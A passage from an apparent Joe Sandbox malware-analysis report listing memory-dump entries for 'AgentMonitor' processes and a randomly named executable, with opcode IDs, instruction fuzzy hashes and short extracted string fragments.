                                      • Instruction Fuzzy Hash: 3FC08C84F4F51B02B5003E3EDA020BFA188CFC4220FF000F2F70C41081BC0D20C5014A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 1f5655556919453b4509072402e376b46b076b761b3ce7a8874f2fb06336f135
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: 72C04C745558098FC948FF39C98591477A0FB1D215BD500D0E409CB271E659DCD5C741
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9e5d40a557d3e7cab0f8f8ee509a6839180c55709900b5ab003830d5080fa71
                                      • Instruction ID: aceffb09fffd6a3a666ec1794aa111dfedd5a3ed8cffca670f043e517cdc9780
                                      • Opcode Fuzzy Hash: c9e5d40a557d3e7cab0f8f8ee509a6839180c55709900b5ab003830d5080fa71
                                      • Instruction Fuzzy Hash: 49C08C80F0DC1652F26B3628D5221BE04538F44702F900074F42ED22CECE0D1A226282
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: b14d3cb641252aa76f0e9a1d8acfffcaa78df1867b04aa080a2de19c63929620
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: B9B01244D9E40F00B4047D7A4A4207670D8DF44100FF400F0F80C40085B84D14940242
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: e0ba0a2d637584aee3ae4320ae925b7f1684e276ea076787f69f6cb77433a2cd
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: a1c9df47f10177e3d473d83243ef1823d7839afeaac2732c14ceab5ccfbfe305
                                      • Instruction ID: a9acfeb0c74effa648b3d3d41f3c204ccb8985ca5deb794de0584dd5e6840b80
                                      • Opcode Fuzzy Hash: a1c9df47f10177e3d473d83243ef1823d7839afeaac2732c14ceab5ccfbfe305
                                      • Instruction Fuzzy Hash: 2C5196D7A0E22299E11236FDF4414ED2B4CCF85234708C6F7EE4D990878E4861BB92F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Y_H
                                      • API String ID: 0-3237497481
                                      • Opcode ID: ed1deb6bd56861c4d256f53bb06722f308a906bc7b1cbef1c6faad31f4a03800
                                      • Instruction ID: d0bf4167ec8a03dc5e8f1ee1a7c861ce4d163420650c33fb906c92f2aeb2b891
                                      • Opcode Fuzzy Hash: ed1deb6bd56861c4d256f53bb06722f308a906bc7b1cbef1c6faad31f4a03800
                                      • Instruction Fuzzy Hash: D291F3F6A1CA8D8FE789EF68C8657A97FE1FB59301F1002BAC049D72D6CA781815C711
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b41891dcccb504f5c8c1372ce36768b02caf9fb7a9170b6b4003056da6dcee4
                                      • Instruction ID: 6b34ba0406f5195af14e3b429a37231c013d8fda11f84d75396250d198869d6f
                                      • Opcode Fuzzy Hash: 8b41891dcccb504f5c8c1372ce36768b02caf9fb7a9170b6b4003056da6dcee4
                                      • Instruction Fuzzy Hash: F6C1AB61A9D6560BE31D7D789E420B577D6FBD2209B3886FDD4EBC708BD91CE4038281
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HKJ$HVJ$X_J$`[J$hIJ$hxJ$pJ
                                      • API String ID: 0-2008210366
                                      • Opcode ID: f30c888f2852f353d713ac27df0412cd97662d874150f4c7ba80b641a68dba50
                                      • Instruction ID: aa1f7b8dbe6476bac08d586ff661b4ae44c8683066d4b29d2b141059bba3439a
                                      • Opcode Fuzzy Hash: f30c888f2852f353d713ac27df0412cd97662d874150f4c7ba80b641a68dba50
                                      • Instruction Fuzzy Hash: 5962C4B1A1DA5A4FEB99FF28C5916B87795FF98300F2441F9D41DC3286CD38AC868781
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I_H
                                      • API String ID: 0-288374528
                                      • Opcode ID: 1ac65d01e823924655e3e4d2a7ce640cf8652b5e33cc11bd904e14067b906b78
                                      • Instruction ID: e0fcf86e76532c175eb9f57ce1e57a1ee74df64fa0f070462ee1b6a1ed55455e
                                      • Opcode Fuzzy Hash: 1ac65d01e823924655e3e4d2a7ce640cf8652b5e33cc11bd904e14067b906b78
                                      • Instruction Fuzzy Hash: 8391F4A1E1CA8A4FE789FEB8D5662B976C5FFA4300F6441F9D40EC328BDD2C68454381
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: eff85e68889c8ff089c83326a8815287c02a2b2a8c29d9a79bb36bb0e0a43217
                                      • Instruction ID: ae98eb3fee223a9fd4ed471aa33af3ad85c4157a2d27c87c957762e08d516c5e
                                      • Opcode Fuzzy Hash: eff85e68889c8ff089c83326a8815287c02a2b2a8c29d9a79bb36bb0e0a43217
                                      • Instruction Fuzzy Hash: 36415EA3A4E6554EE705BFB8E0AA1FD7784DF49321B2441FFD84EC71D3CD0868528291
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 6361f42355e304583f92bab5af10a385bd7b2a1ca67d2c7d32bd2ee41946bbb2
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: BDE04F7368C41687E6A5BE61C5615BA3387BFD4355F3402F7C42A871C1DDBC66068741
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 623cb5ec3db3bcdd7d5264b159ff907fbc61991654675882fca915e8515b09fc
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 85E0ED62A4C1164AFB94BE64D9607A96264FB89310F3440F89A5F933C1DD29AF448746
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8095d38e97042f70a250f3395fd6759b81ce9b8851febf29f12669596dde504b
                                      • Instruction ID: a0cf9faa42b3559fba3a7fac6c7922f2790eb2f23b7b6ade7c4bbd267cf7d704
                                      • Opcode Fuzzy Hash: 8095d38e97042f70a250f3395fd6759b81ce9b8851febf29f12669596dde504b
                                      • Instruction Fuzzy Hash: 2CE01A6294F7C44FC70BAB3488A89417F60AE1721174A40EBC085CF1A3D9198849C711
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction ID: 274bee5e5005abefa55f5eeb3bfa86e4dbe648ba7c0bd547efecab16565b7ff4
                                      • Opcode Fuzzy Hash: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction Fuzzy Hash: 15D02230B908000F870CBA38D8488303390EB6A2037A000A8D00AC72B1D92ADC88CB40
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction ID: d48857607c870562c3a927c2dfae14c7647601126c65630711a84f52b426d7d6
                                      • Opcode Fuzzy Hash: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction Fuzzy Hash: 63D01234B949044F8B0CBF38D8998747391EB6A216BA540A9E00AC72B5D96ADC89C741
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: 68553e4231f3c787109ba703a82ca344d5f3ddda9307c0b9c347bb8c49fb501e
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: ADC08C83DCF51B00F4503E3ED6260ACA108BBCC320FF000F2C02C408D19C4D28C50147
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: cbb027c749ba98a0956ca8649bce8f73cb55e5443490ea6b068c0e10e34a01f2
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: 22C08C304908098FC948FF38C88480433A0FF0D300BE100D0E008CB170E219DCC0C781
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4703d9221eaabdcf5ee25377701550504ef25d02fbb3a61eb883ac8f443258bf
                                      • Instruction ID: b2fb0c95d2d4a879f6513697381b33168f963f44a961e006e639bc43e73398c6
                                      • Opcode Fuzzy Hash: 4703d9221eaabdcf5ee25377701550504ef25d02fbb3a61eb883ac8f443258bf
                                      • Instruction Fuzzy Hash: 89C08CC0F0DC1A53F12B3628C12117E00829F44701FA00074E42EE22CECE0E1A221282
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 66bb24201a25f492608003d269a9a95cee25675911af2233b658dfaf55eacb86
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: 5EB01241CDE40F00B4147F7A4A520647444BB8C300FF000F0D41D400C5988D18940243
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 6db386aad6bf17fdad81bc8a041dc2d4c3adc625ac0fea1f06fdb560be99d77b
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction ID: f0d24af9354582a8bacff447595316fd0c5dbedd41495b30f0f31c9f1b29a123
                                      • Opcode Fuzzy Hash: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction Fuzzy Hash: 7251B4D7A0E22A85E1123ABDF4110FC6B489F45335B5883F3EE4D990C74E8865BB92F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J
                                      • API String ID: 0-1141589763
                                      • Opcode ID: eced5bd1b05cf5feed7f1bccb892cbb99b9758df3248a46a63b1473162740334
                                      • Instruction ID: 4b8b5e43b84fc4dfb15f6141d823eeb5e35cd73316c088ede84034e66d6f1c31
                                      • Opcode Fuzzy Hash: eced5bd1b05cf5feed7f1bccb892cbb99b9758df3248a46a63b1473162740334
                                      • Instruction Fuzzy Hash: 86C19A61A9D6760BE71D7E388E420B5779EFBD2201B3886BDD4EBC7187D91CE4074281
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: b3512f247ef8c711ffad4fc3bc82b8acb434c60b761b2d701ae0292b1d7c51d6
                                      • Instruction ID: 26ad615587c789fbd470abe226e4b2fcbf947fea123fe933f382266596852274
                                      • Opcode Fuzzy Hash: b3512f247ef8c711ffad4fc3bc82b8acb434c60b761b2d701ae0292b1d7c51d6
                                      • Instruction Fuzzy Hash: 7391E1F1A1DAAA8FE789EF68C8657A97FE1FB59300F1001FAC059C72D2DA781815C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HKJ$HVJ$X_J$`[J$hIJ$hxJ$pJ
                                      • API String ID: 0-2008210366
                                      • Opcode ID: bead623ee2d512702acee2014ea35bfe652a73af9b46f115cff0c44f26e181d6
                                      • Instruction ID: 4df331074fbeada4db3fbdf9345c2f44429aea39a8a2c4771358e603d78bd746
                                      • Opcode Fuzzy Hash: bead623ee2d512702acee2014ea35bfe652a73af9b46f115cff0c44f26e181d6
                                      • Instruction Fuzzy Hash: 6D62E3B1A5D91A4FE798FF38C4A16B87396FF98300F2406F9D41DC3286DD28AD468781
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J_H
                                      • API String ID: 0-326533465
                                      • Opcode ID: 63a56664b13e3e26d823b93d6437056c089df8751edb90165dbb13e53a263826
                                      • Instruction ID: 1023ae565ba502fe1ecfca35b04b16041cd7a97893e51adbc90081fc7e5a4db4
                                      • Opcode Fuzzy Hash: 63a56664b13e3e26d823b93d6437056c089df8751edb90165dbb13e53a263826
                                      • Instruction Fuzzy Hash: B791F5A1A5CA5B5FF788FE38C4562B976CDFBA4300F2441F9D45EC7287DD2868494381
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: b7db1b2f2af734889311cbf4a94f04ae6cb7e4c179b366eeadc127a105cbbfdb
                                      • Instruction ID: df302a45c9cfed241d96b0e64ac560b15f78e5a7124691e6cc87eb4329b9a9eb
                                      • Opcode Fuzzy Hash: b7db1b2f2af734889311cbf4a94f04ae6cb7e4c179b366eeadc127a105cbbfdb
                                      • Instruction Fuzzy Hash: 92416EA2A4D6B54EE306BB78E0AA1FD7F84EF45334B2445FFD94EC7093DD0868528291
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 3c356cac85a30c3315b0e1317f9a6c96ce2a30c1a40720fb6bde3d4d836e8d0b
                                      • Instruction ID: 5987d5cd6329aa09c5e248eba8ce66567a83d38e1ad2acab5fe787621fb200ca
                                      • Opcode Fuzzy Hash: 3c356cac85a30c3315b0e1317f9a6c96ce2a30c1a40720fb6bde3d4d836e8d0b
                                      • Instruction Fuzzy Hash: 8D3177A1A0EA6A1FF315BB7CE09A1F97BC9EF44321B6401FED80EC71D3CC0868424291
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: de676f6c7b32f69f890d4fd985bfe0c64b163934f647213c4c4ae201e70c88d0
                                      • Instruction ID: 54694c397e6248b841a36b0b24102df5583792842aba7c93022b48c4f169716d
                                      • Opcode Fuzzy Hash: de676f6c7b32f69f890d4fd985bfe0c64b163934f647213c4c4ae201e70c88d0
                                      • Instruction Fuzzy Hash: 813104A0B5E9691FE349BA38C0AA6B97BC6FF98211B6401FDD44EC3293DC149C418241
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction ID: a22ddae03843cab328321067345e9ea6eab528daaf545d61559a51b261fc2575
                                      • Opcode Fuzzy Hash: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction Fuzzy Hash: 2FF0656154E7C44FC716EA7488694557F60EF6721174A46EFC045CF1A3DA1D8C89C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction ID: e81f38eb0dd38b7ecaa1100520948066fd7da0e4314703f698e60b83ea8287eb
                                      • Opcode Fuzzy Hash: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction Fuzzy Hash: 80F065A154E7D04FCB16AA7488644557F64EF6720174A41EEC055CF1A7DA1DCC45C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 2f25fe49d7a184dc323016da05f6dfba3d16729e3f581a1f80cc04399d300f9d
